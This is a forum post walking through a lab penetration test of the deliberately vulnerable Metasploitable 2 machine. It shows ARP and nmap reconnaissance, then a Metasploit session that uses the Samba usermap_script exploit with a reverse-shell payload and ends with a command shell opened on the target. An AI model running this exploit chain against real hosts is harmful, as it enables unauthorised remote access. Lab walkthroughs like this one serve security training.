Jump to content
crossbower

Pentest on Metasploitable 2

Recommended Posts

Posted (edited)

Pentest on Metasploitable 2

The Metasploitable virtual machine is an intentionally vulnerable version of Ubuntu Linux designed for testing security tools and demonstrating common vulnerabilities. Version 2 of this virtual machine is available for download and ships with even more vulnerabilities than the original image. This virtual machine is compatible with VMWare, VirtualBox, and other common virtualization platforms.

root@kali:~# netdiscover -i wlan1 -r 192.168.1.1/24
Currently scanning: 192.168.1.0/24 | Screen View: Unique Hosts

8 Captured ARP Req/Rep packets, from 8 hosts. Total size: 372
__________________________________________________ ___________________________
IP At MAC Address Count Len MAC Vendor
-----------------------------------------------------------------------------
192.168.1.91 08:00:27:4a:6c:50 01 042 CADMUS COMPUTER SYSTEMS
192.168.1.202 08:00:27:32:43:96 01 042 CADMUS COMPUTER SYSTEMS
192.168.1.1 00:25:53:3e:bc:b9 01 042 Unknown vendor
192.168.1.100 00:09:f8:65:35:64 01 060 UNIMO TECHNOLOGY CO., LTD.
192.168.1.132 00:21:9b:20:a3:bb 01 060 Unknown vendor

Using nmap scanner for identif. port 139 Samba service.

root@kali:~# nmap -p 139 -sV 192.168.1.91

Starting Nmap 6.40 ( http://nmap.org )
Nmap scan report for 192.168.1.91
Host is up (0.00017s latency).
PORT STATE SERVICE VERSION
139/tcp open netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
MAC Address: 08:00:27:4A:6C:50 (Cadmus Computer Systems)

And play game :

root@kali:~# service postgresql start && service metasploit start && msfconsole

msf > use exploit/multi/samba/usermap_script
msf exploit(usermap_script) > show options
Module options (exploit/multi/samba/usermap_script):

Name Current Setting Required Description
---- --------------- -------- -----------
RHOST yes The target address
RPORT 139 yes The target port
Exploit target:
Id Name
-- ----
0 Automatic
msf exploit(usermap_script) > set RHOST 192.168.1.91
RHOST => 192.168.1.91
msf exploit(usermap_script) > set PAYLOAD cmd/unix/reverse
PAYLOAD => cmd/unix/reverse
msf exploit(usermap_script) > set LHOST 191.168.1.19
LHOST => 191.168.1.19
msf exploit(usermap_script) >
msf exploit(usermap_script) > exploit

[

*] Started reverse double handler[*] Accepted the first client connection...[*] Accepted the second client connection...[*] Command: echo BgB1yKJSt3wbArQy;[*] Writing to socket A[*] Writing to socket B[*] Reading from sockets...[*] Reading from socket A[*] A: "sh: line 2: Connected: command not found\r\nsh: line 3: Escape: command
not found\r\nBgB1yKJSt3wbArQy\r\n[*] Matching...[*] B is input...[*] Command shell session 1 opened (192.168.1.19:4444 -> 192.168.1.91:42504)

VIDEO TUT

http://www.youtube.com/watch?v=S3uvS3qEpm8

Edited by crossbower

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.



×
×
  • Create New...